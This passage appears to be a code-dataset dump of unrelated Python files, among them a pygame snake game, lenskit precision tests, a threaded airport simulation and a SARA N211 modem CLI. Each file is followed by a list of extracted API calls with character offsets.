(['min_val'], {}), '(min_val)\n', (10637, 10646), False, 'from decimal import Decimal\n'), ((10758, 10774), 'decimal.Decimal', 'Decimal', (['max_val'], {}), '(max_val)\n', (10765, 10774), False, 'from decimal import Decimal\n'), ((11754, 11786), 'numpy.random.uniform', 'np.random.uniform', (['(-x_dev)', 'x_dev'], {}), '(-x_dev, x_dev)\n', (11771, 11786), True, 'import numpy as np\n'), ((11844, 11862), 'numpy.log', 'np.log', (['data[k][0]'], {}), '(data[k][0])\n', (11850, 11862), True, 'import numpy as np\n'), ((11864, 11879), 'numpy.log', 'np.log', (['min_val'], {}), '(min_val)\n', (11870, 11879), True, 'import numpy as np\n'), ((11881, 11896), 'numpy.log', 'np.log', (['max_val'], {}), '(max_val)\n', (11887, 11896), True, 'import numpy as np\n'), ((12214, 12246), 'numpy.random.uniform', 'np.random.uniform', (['(-x_dev)', 'x_dev'], {}), '(-x_dev, x_dev)\n', (12231, 12246), True, 'import numpy as np\n')]
|
import pygame, sys
from typing import List, Tuple
import time
from pygame.math import Vector2
from .snake import Snake
from .eatable.mouse import Mouse
from .model import Model
from .eatable.sandglass import Sandglass
from .eatable.peel import Peel
from .components import sound_controller
from .eatable.saw import Saw
from .components.background import Background
from .config import FPS, xSize, ySize, SPEED
from .components.score import Score
from .noneatable.bush import Bush
class GUI(object):
def __init__(self) -> None:
# Fenstersetup
self.screen = pygame.display.set_mode((xSize,ySize))
#print(type(screen))
self.SCREEN_UPDATE = pygame.USEREVENT
self.clock = pygame.time.Clock()
# Initialize pygame
pygame.mixer.pre_init(44100,-16,2,512)
pygame.init()
pygame.time.set_timer(self.SCREEN_UPDATE, SPEED)
# Erstellen der Objekte
self.snake = Snake(self.screen)
# Hintergrund
self.background = Background(self.screen)
# Powerups
self.sandglass = Sandglass(self.screen)
self.saw = Saw(self.screen)
self.peel = Peel(self.screen)
# Score
self.score = Score(self.screen)
self.barrier_list = []
self.food_list = []
# Logik
self.model = Model(self.screen, self.snake, self.sandglass, self.saw, self.score, self.food_list, self.barrier_list, self.peel)
# Speed Up
self.speedup = False
def update(self) -> None:
self.model.update_snake() # Snake in Gang setzen
self.model.check_collision() # Kollisionsprüfung Snake mit Maus
self.model.check_fail() # Kollisionsprüfung mit sich selbst
self.model.update_barriers()
def draw_elements(self) -> None:
self.background.draw_background()
self.snake.draw_snake() # Zeichne Snake
for barrier in self.barrier_list:
barrier.draw_barrier()
for obj in self.food_list: # Zeichne Mäuse
obj.draw_food()
self.score.draw_score()
# Hauptschleife
def update_display(self) -> None:
for event in pygame.event.get():
if event.type == pygame.QUIT: # Fenster schließen
pygame.quit()
sys.exit()
if event.type == self.SCREEN_UPDATE:
self.update() # Logik Spielelemente Update
if event.type == pygame.KEYDOWN: # Steuerung von Snake Update
self.model.change_direction(event)
self.draw_elements() # Zeiche alle statische Objekte
pygame.display.update() # Update Display
|
[
"pygame.quit",
"pygame.event.get",
"pygame.display.set_mode",
"pygame.mixer.pre_init",
"pygame.init",
"pygame.display.update",
"pygame.time.Clock",
"pygame.time.set_timer",
"sys.exit"
] |
[((584, 623), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(xSize, ySize)'], {}), '((xSize, ySize))\n', (607, 623), False, 'import pygame, sys\n'), ((720, 739), 'pygame.time.Clock', 'pygame.time.Clock', ([], {}), '()\n', (737, 739), False, 'import pygame, sys\n'), ((777, 818), 'pygame.mixer.pre_init', 'pygame.mixer.pre_init', (['(44100)', '(-16)', '(2)', '(512)'], {}), '(44100, -16, 2, 512)\n', (798, 818), False, 'import pygame, sys\n'), ((824, 837), 'pygame.init', 'pygame.init', ([], {}), '()\n', (835, 837), False, 'import pygame, sys\n'), ((846, 894), 'pygame.time.set_timer', 'pygame.time.set_timer', (['self.SCREEN_UPDATE', 'SPEED'], {}), '(self.SCREEN_UPDATE, SPEED)\n', (867, 894), False, 'import pygame, sys\n'), ((2295, 2313), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (2311, 2313), False, 'import pygame, sys\n'), ((2815, 2838), 'pygame.display.update', 'pygame.display.update', ([], {}), '()\n', (2836, 2838), False, 'import pygame, sys\n'), ((2404, 2417), 'pygame.quit', 'pygame.quit', ([], {}), '()\n', (2415, 2417), False, 'import pygame, sys\n'), ((2434, 2444), 'sys.exit', 'sys.exit', ([], {}), '()\n', (2442, 2444), False, 'import pygame, sys\n')]
|
#!/usr/bin/python
import os
import doxy.module as module
import doxy.debug as debug
import doxy.tools as tools
def create(target, module_name):
my_module = module.Module(__file__, module_name)
my_module.set_version("version.txt")
my_module.set_title("$N gesture recognition")
my_module.set_website("http://atria-soft.github.io/" + module_name)
my_module.set_website_sources("http://github.com/atria-soft/" + module_name)
my_module.add_path([
module_name,
"doc"
])
my_module.add_depend([
'elog',
'etk',
'ejson',
'esvg',
'ememory',
])
my_module.add_exclude_symbols([
'*operator<<*',
])
my_module.add_exclude_file([
'debug.hpp',
])
my_module.add_file_patterns([
'*.hpp',
'*.md',
])
my_module.add_module_define([
"PARSE_DOXYGEN",
])
return my_module
|
[
"doxy.module.Module"
] |
[((158, 194), 'doxy.module.Module', 'module.Module', (['__file__', 'module_name'], {}), '(__file__, module_name)\n', (171, 194), True, 'import doxy.module as module\n')]
|
import numpy as np
import pandas as pd
from pytest import approx
from lenskit.topn import precision
from lenskit.util.test import demo_recs
from lenskit import topn
def _test_prec(items, rel, **k):
recs = pd.DataFrame({'item': items})
truth = pd.DataFrame({'item': rel}).set_index('item')
return precision(recs, truth, **k)
def test_precision_empty_none():
prec = _test_prec([], [1, 3])
assert prec is None
def test_precision_simple_cases():
prec = _test_prec([1, 3], [1, 3])
assert prec == approx(1.0)
prec = _test_prec([1], [1, 3])
assert prec == approx(1.0)
prec = _test_prec([1, 2, 3, 4], [1, 3])
assert prec == approx(0.5)
prec = _test_prec([1, 2, 3, 4], [1, 3, 5])
assert prec == approx(0.5)
prec = _test_prec([1, 2, 3, 4], range(5, 10))
assert prec == approx(0.0)
prec = _test_prec([1, 2, 3, 4], range(4, 10))
assert prec == approx(0.25)
def test_precision_series():
prec = _test_prec(pd.Series([1, 3]), pd.Series([1, 3]))
assert prec == approx(1.0)
prec = _test_prec(pd.Series([1, 2, 3, 4]), pd.Series([1, 3, 5]))
assert prec == approx(0.5)
prec = _test_prec(pd.Series([1, 2, 3, 4]), pd.Series(range(4, 10)))
assert prec == approx(0.25)
def test_precision_series_set():
prec = _test_prec(pd.Series([1, 2, 3, 4]), [1, 3, 5])
assert prec == approx(0.5)
prec = _test_prec(pd.Series([1, 2, 3, 4]), range(4, 10))
assert prec == approx(0.25)
def test_precision_series_index():
prec = _test_prec(pd.Series([1, 3]), pd.Index([1, 3]))
assert prec == approx(1.0)
prec = _test_prec(pd.Series([1, 2, 3, 4]), pd.Index([1, 3, 5]))
assert prec == approx(0.5)
prec = _test_prec(pd.Series([1, 2, 3, 4]), pd.Index(range(4, 10)))
assert prec == approx(0.25)
def test_precision_series_array():
prec = _test_prec(pd.Series([1, 3]), np.array([1, 3]))
assert prec == approx(1.0)
prec = _test_prec(pd.Series([1, 2, 3, 4]), np.array([1, 3, 5]))
assert prec == approx(0.5)
prec = _test_prec(pd.Series([1, 2, 3, 4]), np.arange(4, 10, 1, 'u4'))
assert prec == approx(0.25)
def test_precision_array():
prec = _test_prec(np.array([1, 3]), np.array([1, 3]))
assert prec == approx(1.0)
prec = _test_prec(np.array([1, 2, 3, 4]), np.array([1, 3, 5]))
assert prec == approx(0.5)
prec = _test_prec(np.array([1, 2, 3, 4]), np.arange(4, 10, 1, 'u4'))
assert prec == approx(0.25)
def test_prec_long_rel():
rel = np.arange(100)
items = [1, 0, 150, 3, 10]
r = _test_prec(items, rel, k=5)
assert r == approx(0.8)
def test_prec_long_items():
rel = np.arange(100)
items = [1, 0, 150, 3, 10, 30, 120, 4, 17]
r = _test_prec(items, rel, k=5)
assert r == approx(0.8)
def test_prec_short_items():
rel = np.arange(100)
items = [1, 0, 150]
r = _test_prec(items, rel, k=5)
assert r == approx(2 / 3)
def test_recall_bulk_k(demo_recs):
"bulk and normal match"
train, test, recs = demo_recs
assert test['user'].value_counts().max() > 5
rla = topn.RecListAnalysis()
rla.add_metric(precision, name='pk', k=5)
rla.add_metric(precision)
# metric without the bulk capabilities
rla.add_metric(lambda *a, **k: precision(*a, **k), name='ind_pk', k=5)
rla.add_metric(lambda *a: precision(*a), name='ind_p')
res = rla.compute(recs, test)
assert res.precision.values == approx(res.ind_p.values)
assert res.pk.values == approx(res.ind_pk.values)
|
[
"pandas.DataFrame",
"pandas.Index",
"numpy.arange",
"pandas.Series",
"numpy.array",
"lenskit.topn.precision",
"lenskit.topn.RecListAnalysis",
"pytest.approx"
] |
[((213, 242), 'pandas.DataFrame', 'pd.DataFrame', (["{'item': items}"], {}), "({'item': items})\n", (225, 242), True, 'import pandas as pd\n'), ((312, 339), 'lenskit.topn.precision', 'precision', (['recs', 'truth'], {}), '(recs, truth, **k)\n', (321, 339), False, 'from lenskit.topn import precision\n'), ((2499, 2513), 'numpy.arange', 'np.arange', (['(100)'], {}), '(100)\n', (2508, 2513), True, 'import numpy as np\n'), ((2650, 2664), 'numpy.arange', 'np.arange', (['(100)'], {}), '(100)\n', (2659, 2664), True, 'import numpy as np\n'), ((2818, 2832), 'numpy.arange', 'np.arange', (['(100)'], {}), '(100)\n', (2827, 2832), True, 'import numpy as np\n'), ((3083, 3105), 'lenskit.topn.RecListAnalysis', 'topn.RecListAnalysis', ([], {}), '()\n', (3103, 3105), False, 'from lenskit import topn\n'), ((527, 538), 'pytest.approx', 'approx', (['(1.0)'], {}), '(1.0)\n', (533, 538), False, 'from pytest import approx\n'), ((594, 605), 'pytest.approx', 'approx', (['(1.0)'], {}), '(1.0)\n', (600, 605), False, 'from pytest import approx\n'), ((670, 681), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (676, 681), False, 'from pytest import approx\n'), ((749, 760), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (755, 760), False, 'from pytest import approx\n'), ((831, 842), 'pytest.approx', 'approx', (['(0.0)'], {}), '(0.0)\n', (837, 842), False, 'from pytest import approx\n'), ((913, 925), 'pytest.approx', 'approx', (['(0.25)'], {}), '(0.25)\n', (919, 925), False, 'from pytest import approx\n'), ((979, 996), 'pandas.Series', 'pd.Series', (['[1, 3]'], {}), '([1, 3])\n', (988, 996), True, 'import pandas as pd\n'), ((998, 1015), 'pandas.Series', 'pd.Series', (['[1, 3]'], {}), '([1, 3])\n', (1007, 1015), True, 'import pandas as pd\n'), ((1036, 1047), 'pytest.approx', 'approx', (['(1.0)'], {}), '(1.0)\n', (1042, 1047), False, 'from pytest import approx\n'), ((1071, 1094), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1080, 1094), True, 'import pandas as pd\n'), ((1096, 1116), 'pandas.Series', 'pd.Series', (['[1, 3, 5]'], {}), '([1, 3, 5])\n', (1105, 1116), True, 'import pandas as pd\n'), ((1137, 1148), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (1143, 1148), False, 'from pytest import approx\n'), ((1172, 1195), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1181, 1195), True, 'import pandas as pd\n'), ((1241, 1253), 'pytest.approx', 'approx', (['(0.25)'], {}), '(0.25)\n', (1247, 1253), False, 'from pytest import approx\n'), ((1311, 1334), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1320, 1334), True, 'import pandas as pd\n'), ((1366, 1377), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (1372, 1377), False, 'from pytest import approx\n'), ((1401, 1424), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1410, 1424), True, 'import pandas as pd\n'), ((1459, 1471), 'pytest.approx', 'approx', (['(0.25)'], {}), '(0.25)\n', (1465, 1471), False, 'from pytest import approx\n'), ((1531, 1548), 'pandas.Series', 'pd.Series', (['[1, 3]'], {}), '([1, 3])\n', (1540, 1548), True, 'import pandas as pd\n'), ((1550, 1566), 'pandas.Index', 'pd.Index', (['[1, 3]'], {}), '([1, 3])\n', (1558, 1566), True, 'import pandas as pd\n'), ((1587, 1598), 'pytest.approx', 'approx', (['(1.0)'], {}), '(1.0)\n', (1593, 1598), False, 'from pytest import approx\n'), ((1622, 1645), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1631, 1645), True, 'import pandas as pd\n'), ((1647, 1666), 'pandas.Index', 'pd.Index', (['[1, 3, 5]'], {}), '([1, 3, 5])\n', (1655, 1666), True, 'import pandas as pd\n'), ((1687, 1698), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (1693, 1698), False, 'from pytest import approx\n'), ((1722, 1745), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1731, 1745), True, 'import pandas as pd\n'), ((1790, 1802), 'pytest.approx', 'approx', (['(0.25)'], {}), '(0.25)\n', (1796, 1802), False, 'from pytest import approx\n'), ((1862, 1879), 'pandas.Series', 'pd.Series', (['[1, 3]'], {}), '([1, 3])\n', (1871, 1879), True, 'import pandas as pd\n'), ((1881, 1897), 'numpy.array', 'np.array', (['[1, 3]'], {}), '([1, 3])\n', (1889, 1897), True, 'import numpy as np\n'), ((1918, 1929), 'pytest.approx', 'approx', (['(1.0)'], {}), '(1.0)\n', (1924, 1929), False, 'from pytest import approx\n'), ((1953, 1976), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (1962, 1976), True, 'import pandas as pd\n'), ((1978, 1997), 'numpy.array', 'np.array', (['[1, 3, 5]'], {}), '([1, 3, 5])\n', (1986, 1997), True, 'import numpy as np\n'), ((2018, 2029), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (2024, 2029), False, 'from pytest import approx\n'), ((2053, 2076), 'pandas.Series', 'pd.Series', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (2062, 2076), True, 'import pandas as pd\n'), ((2078, 2103), 'numpy.arange', 'np.arange', (['(4)', '(10)', '(1)', '"""u4"""'], {}), "(4, 10, 1, 'u4')\n", (2087, 2103), True, 'import numpy as np\n'), ((2124, 2136), 'pytest.approx', 'approx', (['(0.25)'], {}), '(0.25)\n', (2130, 2136), False, 'from pytest import approx\n'), ((2189, 2205), 'numpy.array', 'np.array', (['[1, 3]'], {}), '([1, 3])\n', (2197, 2205), True, 'import numpy as np\n'), ((2207, 2223), 'numpy.array', 'np.array', (['[1, 3]'], {}), '([1, 3])\n', (2215, 2223), True, 'import numpy as np\n'), ((2244, 2255), 'pytest.approx', 'approx', (['(1.0)'], {}), '(1.0)\n', (2250, 2255), False, 'from pytest import approx\n'), ((2279, 2301), 'numpy.array', 'np.array', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (2287, 2301), True, 'import numpy as np\n'), ((2303, 2322), 'numpy.array', 'np.array', (['[1, 3, 5]'], {}), '([1, 3, 5])\n', (2311, 2322), True, 'import numpy as np\n'), ((2343, 2354), 'pytest.approx', 'approx', (['(0.5)'], {}), '(0.5)\n', (2349, 2354), False, 'from pytest import approx\n'), ((2378, 2400), 'numpy.array', 'np.array', (['[1, 2, 3, 4]'], {}), '([1, 2, 3, 4])\n', (2386, 2400), True, 'import numpy as np\n'), ((2402, 2427), 'numpy.arange', 'np.arange', (['(4)', '(10)', '(1)', '"""u4"""'], {}), "(4, 10, 1, 'u4')\n", (2411, 2427), True, 'import numpy as np\n'), ((2448, 2460), 'pytest.approx', 'approx', (['(0.25)'], {}), '(0.25)\n', (2454, 2460), False, 'from pytest import approx\n'), ((2598, 2609), 'pytest.approx', 'approx', (['(0.8)'], {}), '(0.8)\n', (2604, 2609), False, 'from pytest import approx\n'), ((2765, 2776), 'pytest.approx', 'approx', (['(0.8)'], {}), '(0.8)\n', (2771, 2776), False, 'from pytest import approx\n'), ((2910, 2923), 'pytest.approx', 'approx', (['(2 / 3)'], {}), '(2 / 3)\n', (2916, 2923), False, 'from pytest import approx\n'), ((3429, 3453), 'pytest.approx', 'approx', (['res.ind_p.values'], {}), '(res.ind_p.values)\n', (3435, 3453), False, 'from pytest import approx\n'), ((3482, 3507), 'pytest.approx', 'approx', (['res.ind_pk.values'], {}), '(res.ind_pk.values)\n', (3488, 3507), False, 'from pytest import approx\n'), ((255, 282), 'pandas.DataFrame', 'pd.DataFrame', (["{'item': rel}"], {}), "({'item': rel})\n", (267, 282), True, 'import pandas as pd\n'), ((3260, 3278), 'lenskit.topn.precision', 'precision', (['*a'], {}), '(*a, **k)\n', (3269, 3278), False, 'from lenskit.topn import precision\n'), ((3330, 3343), 'lenskit.topn.precision', 'precision', (['*a'], {}), '(*a)\n', (3339, 3343), False, 'from lenskit.topn import precision\n')]
|
import re
USERNAME_RE = re.compile(r"^[a-zA-Z0-9_-]{3,20}$")
PASSWORD_RE = re.compile(r"^.{3,20}$")
EMAIL_RE = re.compile(r'^[\S]+@[\S]+\.[\S]+$')
USERNAME_ERROR = "That's not a valid username."
PASSWORD_ERROR = "That wasn't a valid password."
V_PASSWORD_ERROR = "Your passwords didn't match."
EMAIL_ERROR = "That's not a valid email."
EXISTS_ERROR = "That user already exists"
LOGIN_ERROR = "Invalid login"
def chek_username(username):
return username and USERNAME_RE.match(username)
def chek_password(password):
return password and PASSWORD_RE.match(password)
def chek_email(email):
return not email or EMAIL_RE.match(email)
def is_notVerifyed(username, password, confirm, email, usermodel):
not_verifyed = False
kwargs = {'username': username,
'email': email}
if username in [user.username for user in usermodel.objects.all()]:#User.objects.get(username=username).username:
not_verifyed = True
kwargs["un_error"] = EXISTS_ERROR
elif not chek_username(username):
not_verifyed = True
kwargs['n_error'] = USERNAME_ERROR
if not chek_password(password):
not_verifyed = True
kwargs['p_error'] = PASSWORD_ERROR
elif password != confirm:
not_verifyed = True
kwargs['vp_error'] = V_PASSWORD_ERROR
if not chek_email(email):
not_verifyed = True
kwargs['e_error'] = EMAIL_ERROR
if not_verifyed:
return kwargs
# if not chek_username('111'):
# print "ne"
# if not chek_password('<PASSWORD>'):
# print 'pa'
# elif '111' != '111':
# print 'con'
# if not chek_email(''):
# print 'em'
# if USERNAME_RE.match('11'):
# print "re"
|
[
"re.compile"
] |
[((29, 64), 're.compile', 're.compile', (['"""^[a-zA-Z0-9_-]{3,20}$"""'], {}), "('^[a-zA-Z0-9_-]{3,20}$')\n", (39, 64), False, 'import re\n'), ((81, 104), 're.compile', 're.compile', (['"""^.{3,20}$"""'], {}), "('^.{3,20}$')\n", (91, 104), False, 'import re\n'), ((118, 156), 're.compile', 're.compile', (['"""^[\\\\S]+@[\\\\S]+\\\\.[\\\\S]+$"""'], {}), "('^[\\\\S]+@[\\\\S]+\\\\.[\\\\S]+$')\n", (128, 156), False, 'import re\n')]
|
from threading import Thread, Semaphore
from random import randint
from time import sleep
#global array to denote the airplanes in the air
planes = []
tracks = []
planes_landed = -1
passengersDownloaded = 0
mutex = Semaphore(1)
ops = Semaphore(0)
bus = Semaphore(0)
landingTrack = Semaphore(0)
airplane = Semaphore(1)
busBarrier = Semaphore(0)
class Passenger():
def __init__(self,id):
self.id = id
class Generator():
def __init__(self):
pass
def generatePassengers(self,n):
ps = []
for i in range(n):
p = Passenger(i)
ps.append(p)
return ps
class Plane():
g = Generator()
def __init__(self,id):
self.id = id
self.passengers = self.g.generatePassengers(randint(1,8))
self.fly()
def fly(self):
global planes_landed,planes
while True:
airplane.acquire()
print(self)
sleep(5)
with mutex:
if planes_landed < 5:
planes.append(self)
ops.release()
sleep(2)
def time_to_download(self):
time = 0
for p in self.passengers:
time_of_p = 0.4
time += (0.2 + time_of_p)
return time
def __str__(self):
return "Plane #" + str(self.id) + " is arriving with " + str(len(self.passengers)) + " passengers."
class Operator():
def __init__(self,id):
self.id = id
self.isAvailable = True
self.plane = None
self.work()
def work(self):
global planes,planes_landed
while True:
ops.acquire()
with mutex:
planes_landed += 1
p = planes[planes_landed]
if planes_landed < 4:
print("Operator is now attending plane #%d" % p.id)
sleep(2)
landingTrack.release()
else:
print("\tPlane %d must wait until a landing track is available..." % p.id)
with mutex:
planes_landed -= 1
with mutex:
if planes_landed < 5:
airplane.release()
class Track():
def __init__(self,id):
self.id = id
self.receivePlane()
def receivePlane(self):
global planes,planes_landed
while True:
landingTrack.acquire()
sleep(2)
with mutex:
plane = planes[planes_landed]
print("\tLanding track %d ready for plane %d's landing" % (self.id,plane.id))
self.attendPlane(plane)
def attendPlane(self,plane):
global planes_landed,passengersDownloaded
print("\t\t\t\tPassengers are now dowloading from plane %d" % plane.id)
for i in plane.passengers:
print("\t\t\t\tPassenger %d is dowloading from plane %d" % (i.id,plane.id))
sleep(1)
with mutex:
passengersDownloaded += 1
if passengersDownloaded == 10:
bus.release()
class Bus():
def __init__(self):
self.leaveWithPassengers()
def leaveWithPassengers(self):
global passengersDownloaded
while True:
bus.acquire()
print("\t\tBus is now leaving. We have %d passengers" % passengersDownloaded)
sleep(5)
print("\t\tArriving at terminal. %d passengers are going home." % passengersDownloaded)
passengersDownloaded = 0
if __name__ == '__main__':
num_planes = 5
num_tracks = 4
Thread(target=Operator,args=[0]).start()
Thread(target=Bus,args=[]).start()
for i in range(num_planes):
Thread(target=Plane,args=[i]).start()
for i in range(num_tracks):
Thread(target=Track,args=[i]).start()
|
[
"threading.Thread",
"threading.Semaphore",
"random.randint",
"time.sleep"
] |
[((219, 231), 'threading.Semaphore', 'Semaphore', (['(1)'], {}), '(1)\n', (228, 231), False, 'from threading import Thread, Semaphore\n'), ((238, 250), 'threading.Semaphore', 'Semaphore', (['(0)'], {}), '(0)\n', (247, 250), False, 'from threading import Thread, Semaphore\n'), ((257, 269), 'threading.Semaphore', 'Semaphore', (['(0)'], {}), '(0)\n', (266, 269), False, 'from threading import Thread, Semaphore\n'), ((285, 297), 'threading.Semaphore', 'Semaphore', (['(0)'], {}), '(0)\n', (294, 297), False, 'from threading import Thread, Semaphore\n'), ((309, 321), 'threading.Semaphore', 'Semaphore', (['(1)'], {}), '(1)\n', (318, 321), False, 'from threading import Thread, Semaphore\n'), ((335, 347), 'threading.Semaphore', 'Semaphore', (['(0)'], {}), '(0)\n', (344, 347), False, 'from threading import Thread, Semaphore\n'), ((914, 922), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (919, 922), False, 'from time import sleep\n'), ((687, 700), 'random.randint', 'randint', (['(1)', '(8)'], {}), '(1, 8)\n', (694, 700), False, 'from random import randint\n'), ((814, 822), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (819, 822), False, 'from time import sleep\n'), ((1930, 1938), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (1935, 1938), False, 'from time import sleep\n'), ((2355, 2363), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (2360, 2363), False, 'from time import sleep\n'), ((2702, 2710), 'time.sleep', 'sleep', (['(5)'], {}), '(5)\n', (2707, 2710), False, 'from time import sleep\n'), ((2893, 2926), 'threading.Thread', 'Thread', ([], {'target': 'Operator', 'args': '[0]'}), '(target=Operator, args=[0])\n', (2899, 2926), False, 'from threading import Thread, Semaphore\n'), ((2935, 2962), 'threading.Thread', 'Thread', ([], {'target': 'Bus', 'args': '[]'}), '(target=Bus, args=[])\n', (2941, 2962), False, 'from threading import Thread, Semaphore\n'), ((1526, 1534), 'time.sleep', 'sleep', (['(2)'], {}), '(2)\n', (1531, 1534), False, 'from time import sleep\n'), ((3001, 3031), 'threading.Thread', 'Thread', ([], {'target': 'Plane', 'args': '[i]'}), '(target=Plane, args=[i])\n', (3007, 3031), False, 'from threading import Thread, Semaphore\n'), ((3070, 3100), 'threading.Thread', 'Thread', ([], {'target': 'Track', 'args': '[i]'}), '(target=Track, args=[i])\n', (3076, 3100), False, 'from threading import Thread, Semaphore\n')]
|
import json
from django.core.serializers.json import DjangoJSONEncoder
from tastypie.serializers import Serializer
class CustomJSONSerializer(Serializer):
def to_json(self, data, options=None):
options = options or {}
data = self.to_simple(data, options)
return json.dumps(data, cls=DjangoJSONEncoder)
def from_json(self, content):
data = json.loads(content)
return data
|
[
"json.loads",
"json.dumps"
] |
[((294, 333), 'json.dumps', 'json.dumps', (['data'], {'cls': 'DjangoJSONEncoder'}), '(data, cls=DjangoJSONEncoder)\n', (304, 333), False, 'import json\n'), ((384, 403), 'json.loads', 'json.loads', (['content'], {}), '(content)\n', (394, 403), False, 'import json\n')]
|
from functools import lru_cache
from typing import Dict
import base64
try:
from ..league_process import find_path_of_league
except ValueError:
from src.league_client_api.league_process import find_path_of_league
def _read_lockfile() -> Dict:
path = find_path_of_league()
with open(path, 'r') as f:
lock_file = f.read().split(':')
return {'port': lock_file[2], 'password': lock_file[3]}
@lru_cache
def get_lockfile_content() -> Dict:
lock_file = _read_lockfile()
username = 'riot'
port = lock_file['port']
password = lock_file['password']
encrypted_auth = base64.b64encode(f'{username}:{password}'.encode('utf-8')).decode('utf-8')
print({'username': username, 'port': port, 'password': password, 'encrypted': encrypted_auth})
return {'username': username, 'port': port, 'password': password, 'encrypted': encrypted_auth}
def clear_cache():
get_lockfile_content.cache_clear()
|
[
"src.league_client_api.league_process.find_path_of_league"
] |
[((264, 285), 'src.league_client_api.league_process.find_path_of_league', 'find_path_of_league', ([], {}), '()\n', (283, 285), False, 'from src.league_client_api.league_process import find_path_of_league\n')]
|
from st7920 import Screen
from gfx import GFX
from sysfont import sysfont
import machine
import time
machine.freq(160000000)
spi = machine.SPI(1, baudrate=80000000, polarity=1, phase=1)
screen = Screen(slaveSelectPin=Pin(15), resetDisplayPin=Pin(5))
draw=GFX(128,64,screen.plot)
#screen.set_rotation(2)
screen.clear()
def test1():
t0=time.ticks_ms()
# screen.fill_rect(0,0,127,63)
screen.redraw()
t1=time.ticks_ms()
delta=time.ticks_diff(t1,t0)
print(delta/1000)
def test2():
t0=time.ticks_ms()
# draw.fill_rect(0,0,128,64,1)
screen.redraw()
t1=time.ticks_ms()
delta=time.ticks_diff(t1,t0)
print(delta/1000)
test1()
test2()
|
[
"machine.SPI",
"time.ticks_ms",
"gfx.GFX",
"machine.freq",
"time.ticks_diff"
] |
[((102, 125), 'machine.freq', 'machine.freq', (['(160000000)'], {}), '(160000000)\n', (114, 125), False, 'import machine\n'), ((132, 186), 'machine.SPI', 'machine.SPI', (['(1)'], {'baudrate': '(80000000)', 'polarity': '(1)', 'phase': '(1)'}), '(1, baudrate=80000000, polarity=1, phase=1)\n', (143, 186), False, 'import machine\n'), ((256, 281), 'gfx.GFX', 'GFX', (['(128)', '(64)', 'screen.plot'], {}), '(128, 64, screen.plot)\n', (259, 281), False, 'from gfx import GFX\n'), ((340, 355), 'time.ticks_ms', 'time.ticks_ms', ([], {}), '()\n', (353, 355), False, 'import time\n'), ((418, 433), 'time.ticks_ms', 'time.ticks_ms', ([], {}), '()\n', (431, 433), False, 'import time\n'), ((444, 467), 'time.ticks_diff', 'time.ticks_diff', (['t1', 't0'], {}), '(t1, t0)\n', (459, 467), False, 'import time\n'), ((510, 525), 'time.ticks_ms', 'time.ticks_ms', ([], {}), '()\n', (523, 525), False, 'import time\n'), ((588, 603), 'time.ticks_ms', 'time.ticks_ms', ([], {}), '()\n', (601, 603), False, 'import time\n'), ((614, 637), 'time.ticks_diff', 'time.ticks_diff', (['t1', 't0'], {}), '(t1, t0)\n', (629, 637), False, 'import time\n')]
|
import click
import tabulate
from .module import SaraN211Module, PingError
def connect_module(module: SaraN211Module, app_ctx):
click.echo(click.style(f"Connecting to network...", fg="yellow", bold=True))
module.read_module_status()
if app_ctx.apn:
module.set_pdp_context(apn=app_ctx.apn)
module.enable_signaling_connection_urc()
module.enable_network_registration()
module.enable_radio_functions()
if app_ctx.psm:
module.enable_psm_mode()
else:
module.disable_psm_mode()
module.connect(app_ctx.mno)
click.echo(click.style(f"Connected!", fg="yellow", bold=True))
@click.command()
@click.pass_obj
def connect(app_ctx):
"""
Connect to the network and get general info on module and network
"""
module: SaraN211Module = app_ctx.module
connect_module(module, app_ctx)
header = ["IMEI", "IMSI", "ICCID", "IP", "APN"]
data = [[module.imei, module.imsi, module.iccid, module.ip, module.apn]]
click.echo(
click.style(
tabulate.tabulate(
data, header, tablefmt="github", numalign="left", stralign="left"
),
fg="red",
)
)
@click.command()
@click.argument("ip")
@click.option("--runs", "-r", default=1, help="How many times should we ping")
@click.pass_obj
def ping(app_ctx, ip, runs):
"""
Ping an IP address
"""
module: SaraN211Module = app_ctx.module
connect_module(module, app_ctx)
click.echo(click.style(f"Pinging IP {ip}", fg="blue"))
results = []
for i in range(0, runs):
try:
ttl, rtt = module.ping(ip)
results.append((rtt, ttl))
click.echo(click.style(f"Success: rtt: {rtt}, ttl: {ttl}", fg="red"))
except PingError as e:
click.echo(click.style(f"**\t{e.args[0]}\t**", fg="red", bold=True))
click.echo("\nResults:")
click.echo(
click.style(
tabulate.tabulate(
results,
headers=["Round trip time (ms)", "Time to live (ms)"],
tablefmt="github",
numalign="left",
stralign="left",
),
fg="red",
)
)
@click.command()
@click.pass_obj
def stats(app_ctx):
"""
Print statistics from the module.
"""
module: SaraN211Module = app_ctx.module
connect_module(module, app_ctx)
click.echo(click.style(f"Collecting statistics...", fg="blue"))
module.update_radio_statistics()
header = ["Stat", "Value"]
data = list()
data.append(("ECL", f"{module.radio_ecl}"))
data.append(("Signal power", f"{module.radio_signal_power} dBm"))
data.append(("Total power", f"{module.radio_total_power} dBm"))
